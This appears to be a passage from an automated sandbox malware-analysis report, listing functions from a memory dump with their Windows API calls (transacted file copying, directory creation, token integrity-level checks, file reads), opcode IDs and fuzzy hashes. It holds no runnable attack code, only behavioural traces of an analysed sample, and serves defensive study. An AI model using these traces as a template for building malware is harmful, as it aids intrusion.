Instruction Fuzzy Hash: 89F0FC705043587BAB01ABB559469DF7FB8DE1A354F5064A9E406B3202D5B44A0AC36A

Uniqueness

Uniqueness Score: -1.00%

Function 00451FD7, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045201F

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 21d25ecbbf9ea9f93328aa0cadd386e1fe6aa0adc3fd3a3cbe0fb818797eaec8
Instruction ID: 7f3b98c9a67bb447505590734fcf4efca538f653502ec9d99d959ff18fe6f8fc
Opcode Fuzzy Hash: 21d25ecbbf9ea9f93328aa0cadd386e1fe6aa0adc3fd3a3cbe0fb818797eaec8
Instruction Fuzzy Hash: 3BE0EC3360391105D222673B7E0276E06459B82B77F15022FFD20871E3DFAC444D91ED

Uniqueness

Uniqueness Score: -1.00%

Function 0043BA50, Relevance: 3.0, APIs: 2, Instructions: 20fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,6BEACDE9,?,?,?,0043BCEA,00000000,004195AC,00000000,6BEACDE9,?,?,?,?,004195AC), ref: 0043BA60
GetLastError.KERNEL32(?,0043BCEA,00000000,004195AC,00000000,6BEACDE9,?), ref: 0043BA76

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CopyErrorFileLast
String ID:
API String ID: 374144340-0
Opcode ID: 7fe25450b0cd014adbf295d8033cd723659ea563c3c6456fe1e62429e4d6d897
Instruction ID: d0bc98f5e7a5109817a729b5b602e4fbb499ac2e97b41cbc4c95aa36efa0d260
Opcode Fuzzy Hash: 7fe25450b0cd014adbf295d8033cd723659ea563c3c6456fe1e62429e4d6d897
Instruction Fuzzy Hash: 3BE02630508288FFDB008FA4CC09F6E3FE8AB05344F048058F90091220E7B4C5509B26

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6A9, Relevance: 2.6, APIs: 2, Instructions: 88memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004124F9: _Deallocate.LIBCONCRT ref: 0041250E

GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0040C602
HeapFree.KERNEL32(00000000), ref: 0040C609

Part of subcall function 00432544: __EH_prolog.LIBCMT ref: 00432549

Part of subcall function 0040C042: __EH_prolog.LIBCMT ref: 0040C047

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologHeap$DeallocateFreeProcess
String ID:
API String ID: 1933738058-0
Opcode ID: 8a6cc4ec33a26b488f40e6a6872012ab79f76d3bc20276f4ae188bdc979c0330
Instruction ID: fdc56e7b420ee24a225f675f8515c01948b01e9c79c426ae5a7c7f78fb732999
Opcode Fuzzy Hash: 8a6cc4ec33a26b488f40e6a6872012ab79f76d3bc20276f4ae188bdc979c0330
Instruction Fuzzy Hash: 8C311A30C00249DBDF24DBE4C994AEDBBB5AF18304F10459EE40577292DB786A98DF65

Uniqueness

Uniqueness Score: -1.00%

Function 004160E7, Relevance: 1.8, APIs: 1, Instructions: 304COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004160EC

Part of subcall function 0040B6C3: __EH_prolog.LIBCMT ref: 0040B6C8

Part of subcall function 004124F9: _Deallocate.LIBCONCRT ref: 0041250E

Part of subcall function 004324C8: __EH_prolog.LIBCMT ref: 004324CD
Part of subcall function 004324C8: _strcat.LIBCMT ref: 00432525

Part of subcall function 0040BFD3: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,004195F5,00000000), ref: 0040BFE7
Part of subcall function 0040BFD3: CreateDirectoryTransactedA.KERNEL32 ref: 0040C000
Part of subcall function 0040BFD3: CommitTransaction.KTMW32(00000000,?,004195F5,00000000), ref: 0040C00B

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

Part of subcall function 00414A2D: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,?,00000000,?,?,00417C45,?,?,?), ref: 00414A43
Part of subcall function 00414A2D: CopyFileTransactedA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00414A69
Part of subcall function 00414A2D: CommitTransaction.KTMW32(00000000,?,00417C45,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 00414A74

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$CreateH_prolog$CommitDeallocateTransacted$CopyDirectoryFile_strcat
String ID:
API String ID: 766783516-0
Opcode ID: e34ea5e3d7cc709f9b749770acdb86b528a6acaf57fe8f0e0961057033985439
Instruction ID: 5df3dbcb903e104331d60fa0cc98f7ee72547aa0843295c4ce5d757bf9da2a3b
Opcode Fuzzy Hash: e34ea5e3d7cc709f9b749770acdb86b528a6acaf57fe8f0e0961057033985439
Instruction Fuzzy Hash: 3DC1E270D00258DBDF14EBA5C990BEEBBB1BF54304F1081AEE44977282DB785A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00410B4B, Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00410B50

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7a50f115d7a4d7914c0da42e967680398f7f4f3aa35ea8c5bab9f7004d61ef5d
Instruction ID: e2ceebcd8e586e92ca7d4960ddaf21bcd148c5b67fd8324b81c2f798da1b0ee7
Opcode Fuzzy Hash: 7a50f115d7a4d7914c0da42e967680398f7f4f3aa35ea8c5bab9f7004d61ef5d
Instruction Fuzzy Hash: 52517031901609DFCB18DFA9C5908EEBBB5EF44314F60065EE412A3280E7B9AAC5CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004131B9, Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004131BE

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cc4d3d4ccc53e15b2663760de6e81390f620f36a0cf79d79e53c98594fd7f49b
Instruction ID: 9b115ffdc7666f58bbfdcc1a5b5fbedd564d5e284e16582935f3536340fb1acc
Opcode Fuzzy Hash: cc4d3d4ccc53e15b2663760de6e81390f620f36a0cf79d79e53c98594fd7f49b
Instruction Fuzzy Hash: 1251D234A005059FCB24EFA8C9C08EDBBF1BF49725B24428AE525D7391C738DE81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041132A, Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c2f96a9ca80ea1b2ed31e42592609b27e716cd6247b1f61500514458a7676a5
Instruction ID: bd65a7cbb3cb8542db4bdc3ee9413025387bbe88f63c867ba718c146653d77cf
Opcode Fuzzy Hash: 7c2f96a9ca80ea1b2ed31e42592609b27e716cd6247b1f61500514458a7676a5
Instruction Fuzzy Hash: CC412774604709DFC715CF28C08099ABBF5FF49314B208AAAE956CBB65E734B984CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041C8F7, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 0041C71F: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041C90E,00000002,00000000,00000000,00000000,?,?,0041CA44,?,00000000,00000000), ref: 0041C752

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,00000000,?,?,0041CA44,?,00000000,00000000), ref: 0041C927

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: f6f5b8745af2030c6442d602d011a92788d34c97357dead4f7d415ff15b6621a
Instruction ID: cad2e184e964e7b775ddf26f219fd83b3ab781f29f517cdc0846c1ffaf8af5cd
Opcode Fuzzy Hash: f6f5b8745af2030c6442d602d011a92788d34c97357dead4f7d415ff15b6621a
Instruction Fuzzy Hash: CE31B0F1A40245ABEF15CA64CCC17AEBBA5AF403A4F24416BD651E73C1D7789DC18B48

Uniqueness

Uniqueness Score: -1.00%

Function 00432E69, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00432E6E

Part of subcall function 00412C1F: __EH_prolog.LIBCMT ref: 00412C24

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a2d3bf4f14b92f0fcb413d257797799721e7e6c1dcf1a4812828ef4b78d7cf5f
Instruction ID: 0d4945c27e980974236be0dcc89d065b56386109b586834f10ff86920ad177fe
Opcode Fuzzy Hash: a2d3bf4f14b92f0fcb413d257797799721e7e6c1dcf1a4812828ef4b78d7cf5f
Instruction Fuzzy Hash: 54315D71A00218DFEB14DF65DD95FE9B7B4EB44304F1085AFE80AA7281D7B45E84CE64

Uniqueness

Uniqueness Score: -1.00%

Function 00435FB3, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00435FB8

Part of subcall function 00413E24: __EH_prolog.LIBCMT ref: 00413E29

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f5987a4de9570299e46a545af7c0f05c1bfa6f8260dddbc647c0605d915e0476
Instruction ID: 981ee5b12e2ce936ed6114e32f9142675f3e2f9a03d23ade754ebcbcaeddb101
Opcode Fuzzy Hash: f5987a4de9570299e46a545af7c0f05c1bfa6f8260dddbc647c0605d915e0476
Instruction Fuzzy Hash: 11319370904245EFCB18DFA9C491AADBBF0AF48324F25815FF55AA7381CB788A41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00420CBD, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00420CC2

Part of subcall function 00435B10: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00435B22
Part of subcall function 00435B10: OpenProcessToken.ADVAPI32(00000000), ref: 00435B29
Part of subcall function 00435B10: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00435B43
Part of subcall function 00435B10: GetLastError.KERNEL32 ref: 00435B4D
Part of subcall function 00435B10: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00435B5D
Part of subcall function 00435B10: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00435B71
Part of subcall function 00435B10: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00435B85
Part of subcall function 00435B10: GlobalFree.KERNEL32 ref: 00435BA5

Part of subcall function 0041DE02: __EH_prolog.LIBCMT ref: 0041DE07

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Token$GlobalH_prologInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
String ID:
API String ID: 2888657697-0
Opcode ID: 7233d6b40b1797246fc80df897043987316248fa0fb4c4f404e78f87b894f921
Instruction ID: 5865813e986b49a454cab27a2be8b5efbb4a2c520c8a455c9949b81b1d216985
Opcode Fuzzy Hash: 7233d6b40b1797246fc80df897043987316248fa0fb4c4f404e78f87b894f921
Instruction Fuzzy Hash: 97318970E02219EECB04EFB5D5915EDFBB0BF54308F10415EE41567282DB786A85CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00442F28, Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 00442FEC

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CallFilterFunc@8
String ID:
API String ID: 4062629308-0
Opcode ID: 3c7f9d78262fff057e54458e66ab5c0b89b291cdc7d87550036653d6efe11ec5
Instruction ID: fa3a0fbabccbac2d8c5b8ddfa6c9bdd5cf8d62fac514a1079d62dbacaa3252e9
Opcode Fuzzy Hash: 3c7f9d78262fff057e54458e66ab5c0b89b291cdc7d87550036653d6efe11ec5
Instruction Fuzzy Hash: 402168729002104BEB149F68AD0236E3361AF4573CFA5475FF8218B3D2D7BC9846A75D

Uniqueness

Uniqueness Score: -1.00%

Function 004127F1, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 0041286F

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: cc0f75665f67463b3f78838a73181cabdd2ab095d839f24ed55c4ceb65aa20db
Instruction ID: 0cbea654ba7617eb665fc7ee31a86a3c4a194ee8c9d9d10efaf4d82bf18a3fa6
Opcode Fuzzy Hash: cc0f75665f67463b3f78838a73181cabdd2ab095d839f24ed55c4ceb65aa20db
Instruction Fuzzy Hash: DF1127B1500210BFE714AF29D8819AEBBECFB45350F14061FF555D7241D7B4AE9087E9

Uniqueness

Uniqueness Score: -1.00%

Function 00413943, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 004139A6

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: f4139199a7fc0b71e25933facaed5b42af21b2661d0812c8efe8733aab564430
Instruction ID: 3197c616cb48263138f9698d22712a3f6931c0bc4e9fe698374c509e3d448b28
Opcode Fuzzy Hash: f4139199a7fc0b71e25933facaed5b42af21b2661d0812c8efe8733aab564430
Instruction Fuzzy Hash: E911C6B1900214BB8B08DF6DD885CDBBBADEE45354B1005AEF818DB246D674EA4087E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041438D, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00409995

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception
String ID:
API String ID: 2807920213-0
Opcode ID: 7eaae3294808f63d6c63fa1aa3b4a3fbd9cb919a83f68f39c00eb50a951bae8b
Instruction ID: f6119bc3aa27d202c1fd121cd2a1e26a6f662afa217d8b20ef49eb517126fa33
Opcode Fuzzy Hash: 7eaae3294808f63d6c63fa1aa3b4a3fbd9cb919a83f68f39c00eb50a951bae8b
Instruction Fuzzy Hash: BEF0D67290021967C714BAA5A816D9F7B9C9E40758710052FB518A7242EB39ED1583DD

Uniqueness

Uniqueness Score: -1.00%

Function 0043ADF8, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,?,?,00000000,00DB6F70,?,00DB6F70,?,0043B44F,00DB7004,00004000), ref: 0043AE63

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 5481baefa0d68a874fbd1d11f6b649320851f55ba8e0e87a5b47545e3c070f57
Instruction ID: b52a546d26e7be716c84d7e7f40070f6bc98f5a854b9366ab635db58fa862c80
Opcode Fuzzy Hash: 5481baefa0d68a874fbd1d11f6b649320851f55ba8e0e87a5b47545e3c070f57
Instruction Fuzzy Hash: 39119D31680515BBDB05DF26C805A9ABBA8FF08764F10811AF8A897210DB74FD70DBDA

Uniqueness

Uniqueness Score: -1.00%

Function 0045857A, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004585B4

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 845ff804393d8bd41cb0b483b6653791d8f92d17be7781a9320720bef7b5b31b
Instruction ID: 1ac6b20379f423a323f82d0844db3348da371b273a8cb0515cfbcc42ea5f366a
Opcode Fuzzy Hash: 845ff804393d8bd41cb0b483b6653791d8f92d17be7781a9320720bef7b5b31b
Instruction Fuzzy Hash: 51111C75A0410AAFCF05DF59E94199F7BF4EF48304F04405AF805AB352EA35D915CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412F47, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412F4C

Part of subcall function 0040B271: __EH_prolog.LIBCMT ref: 0040B276

Part of subcall function 0040B3BF: __EH_prolog.LIBCMT ref: 0040B3C4

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0176b4a190f7f65c83c5c0cd4dc7c1010e2f66c4d14d7ad5c4017763ca4532a9
Instruction ID: 53462409c75a23d752f5e52a73c89098a6bd28ca09ff53d5291ddb1fdf7d6bf4
Opcode Fuzzy Hash: 0176b4a190f7f65c83c5c0cd4dc7c1010e2f66c4d14d7ad5c4017763ca4532a9
Instruction Fuzzy Hash: D8119E71A00214ABDF54EFA9C985BDEBBB0EF08304F0080AFE509A7292CB749D54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041C71F, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041C90E,00000002,00000000,00000000,00000000,?,?,0041CA44,?,00000000,00000000), ref: 0041C752

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3334539efe16167db9c7b29786b900a0498ba7aca1b15e80c781fbf290d18a79
Instruction ID: a812d3742cfce83be424f01854c484b2fe3c00cf53625b379acb7a495dccb661
Opcode Fuzzy Hash: 3334539efe16167db9c7b29786b900a0498ba7aca1b15e80c781fbf290d18a79
Instruction Fuzzy Hash: 010144705C4206BEEB248E18CDC1BB63799AB51718F348457E129C92C1D3EAC8C39E9E

Uniqueness

Uniqueness Score: -1.00%

Function 0041C78A, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,?,0000FFFF,00000000,?,0041C9B2,00000001,00000000,00000000,00000000,00000000), ref: 0041C7B0

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6e11879d5ce08cfb8992a5ea8e0442d6938f21ef9c294c03b7025c75feea8998
Instruction ID: fc43424ccc56ecce6d89bb186a6e0826fe53bc0e454d18647c99224760d67190
Opcode Fuzzy Hash: 6e11879d5ce08cfb8992a5ea8e0442d6938f21ef9c294c03b7025c75feea8998
Instruction Fuzzy Hash: 00015E72600106BFE708CF59DC81AA6B7B9FB95344F14822AF40497650E3B0BD90CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00409AEB, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409AF0

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 62131ae43a6636c451ba1bc2053b7dcf1315ea5250ddbc3d4746f8daed15193e
Instruction ID: 5d725af3ebe17fe8aa28736aee0babf9f6394225ab9a5ccb5143cb6f3bd6f9d2
Opcode Fuzzy Hash: 62131ae43a6636c451ba1bc2053b7dcf1315ea5250ddbc3d4746f8daed15193e
Instruction Fuzzy Hash: 8C111C71A00209DFCB00DFA9C6919DE77B4FF08304F50456EF805A7191D775AE54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00442DF1, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4853f7400209641320e63db9853cfc0b201926485b856d157e946baedf348337
Instruction ID: 04cd629f244f4d89dc7472f02a265550040f48d5c72fbccaf5d204add480beea
Opcode Fuzzy Hash: 4853f7400209641320e63db9853cfc0b201926485b856d157e946baedf348337
Instruction Fuzzy Hash: F3F0F932511B105AE6313A6A9D0176B33589F9173EF60071FFD24931D2CBBCD94B869D

Uniqueness

Uniqueness Score: -1.00%

Function 00432961, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(?,?,00000104,004879A4), ref: 004329AD

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: f2ee3aeb33414b0ee0ae96f1e34403b762d68a21a7734c90baa49e21a33e029c
Instruction ID: 976076806c0d1f42c96f2518ddeb9541b670868b2e21fb34977edbda2847cc84
Opcode Fuzzy Hash: f2ee3aeb33414b0ee0ae96f1e34403b762d68a21a7734c90baa49e21a33e029c
Instruction Fuzzy Hash: E801D670D0428C6ADF16CFF885506EEBBB4AF49204F1091ADC485B6242E274534DDB66

Uniqueness

Uniqueness Score: -1.00%

Function 00412352, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412357

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 768c07828f98e67ef2ceebfda347007f3a843b4da4fa5541ecb9ed26d1bc4b1e
Instruction ID: be46ef3b4f468a1252eac16956d8f1f659ee7e7ac5f59727e7953d4d87570c8b
Opcode Fuzzy Hash: 768c07828f98e67ef2ceebfda347007f3a843b4da4fa5541ecb9ed26d1bc4b1e
Instruction Fuzzy Hash: 26115E746002058FDB55CF68C540B6A77B2FF85318F24869ED8518B346D7BAE842CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00411594, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00411599

Part of subcall function 004123D0: __EH_prolog.LIBCMT ref: 004123D5

Part of subcall function 00412BD8: __EH_prolog.LIBCMT ref: 00412BDD
Part of subcall function 00412BD8: std::locale::_Init.LIBCPMT ref: 00412BFB

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Initstd::locale::_
String ID:
API String ID: 1266419734-0
Opcode ID: a962e7383bf898d6da4c97e3197c2ab4804fb9bcdb814945f8ea9da9481c3d39
Instruction ID: e70f1c1dc3d92491f731ba17aab9a3e806502a8d9e2299736ff268686b1cee70
Opcode Fuzzy Hash: a962e7383bf898d6da4c97e3197c2ab4804fb9bcdb814945f8ea9da9481c3d39
Instruction Fuzzy Hash: D411A9B1A102059FC310CF59C980BAAFBF4FF44369F60856FE00997640C3B8AE44CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0043B6B6, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043B6BB

Part of subcall function 0043A8E2: CreateFileMappingA.KERNEL32 ref: 0043A915

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFileH_prologMapping
String ID:
API String ID: 3367180550-0
Opcode ID: eb664257cd5026c0fb8d9a3726c676d204940eabf678b8caed6bbb79805e5ea5
Instruction ID: 3f9575e9a3654afe3d024146a058709a229ea51fe5f56bd79a92c56faea99fe3
Opcode Fuzzy Hash: eb664257cd5026c0fb8d9a3726c676d204940eabf678b8caed6bbb79805e5ea5
Instruction Fuzzy Hash: 340109B0911B109EC364DF79940271ABAF0FF4C714F108A2FA1AED7A51E774A5008B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B271, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040B276

Part of subcall function 0040B1CA: __EH_prolog.LIBCMT ref: 0040B1CF
Part of subcall function 0040B1CA: ___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040B238

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$___std_fs_directory_iterator_open@12
String ID:
API String ID: 1512400408-0
Opcode ID: 506d650cbe3931d0e1957ab786fe516b60f73f57f2009e5a46ea6e2c84ce5b6b
Instruction ID: b8110095056fe1ef8a0ec52aefb3037783c92b794980b7387f5a127fdbc3fcb4
Opcode Fuzzy Hash: 506d650cbe3931d0e1957ab786fe516b60f73f57f2009e5a46ea6e2c84ce5b6b
Instruction Fuzzy Hash: D5016971904705DFCB29DFA8C4946AEBBE4EF04314F20466EE45AA3381D774AA04CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00452CA0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 004561ED: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0045504D,00000001,00000364,00000008,000000FF,?,0043E9FE,00000002,00000000,?,?), ref: 0045622E

_free.LIBCMT ref: 00452CC0

Part of subcall function 00455CC3: RtlFreeHeap.NTDLL(00000000,00000000,?,0045F0EB,?,00000000,?,00000002,?,0045F38E,?,00000007,?,?,0045F78F,?), ref: 00455CD9
Part of subcall function 00455CC3: GetLastError.KERNEL32(?,?,0045F0EB,?,00000000,?,00000002,?,0045F38E,?,00000007,?,?,0045F78F,?,?), ref: 00455CEB

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: eb558d1bc333c2c5a3d4db829178aa3c0375441c877cbaeb9f41d5ec77c45286
Instruction ID: a05ba7841496f61dc6b74c25398ec6440b62a77793d8b0bfb8293d9bcb4b700f
Opcode Fuzzy Hash: eb558d1bc333c2c5a3d4db829178aa3c0375441c877cbaeb9f41d5ec77c45286
Instruction Fuzzy Hash: CD0108B6D00619AFCB10DFA9C841E9EBBB8FB48710F10412BE914E7341E774AA45CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 00440DD3, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00000000,?,?,0043C5E1,00000000,00483608,?), ref: 00440E33

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cffc092c7002a5512966d87e819ead8434e8ceb918b2865b82ead8fc87ce9393
Instruction ID: c6accca5544528b53e22285866f31372e686bbecbe11cf0bd807081d8b0bbd5c
Opcode Fuzzy Hash: cffc092c7002a5512966d87e819ead8434e8ceb918b2865b82ead8fc87ce9393
Instruction Fuzzy Hash: B9018F31900218AFD7019F58D884BAEBBB8EF48714F15455AEA05AB3A0E7B4ED21CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00412240, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412245

Part of subcall function 0041355B: __EH_prolog.LIBCMT ref: 00413560
Part of subcall function 0041355B: std::_Lockit::_Lockit.LIBCPMT ref: 0041356E
Part of subcall function 0041355B: int.LIBCPMT ref: 00413585
Part of subcall function 0041355B: std::_Lockit::~_Lockit.LIBCPMT ref: 004135D5

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologLockitstd::_$Lockit::_Lockit::~_
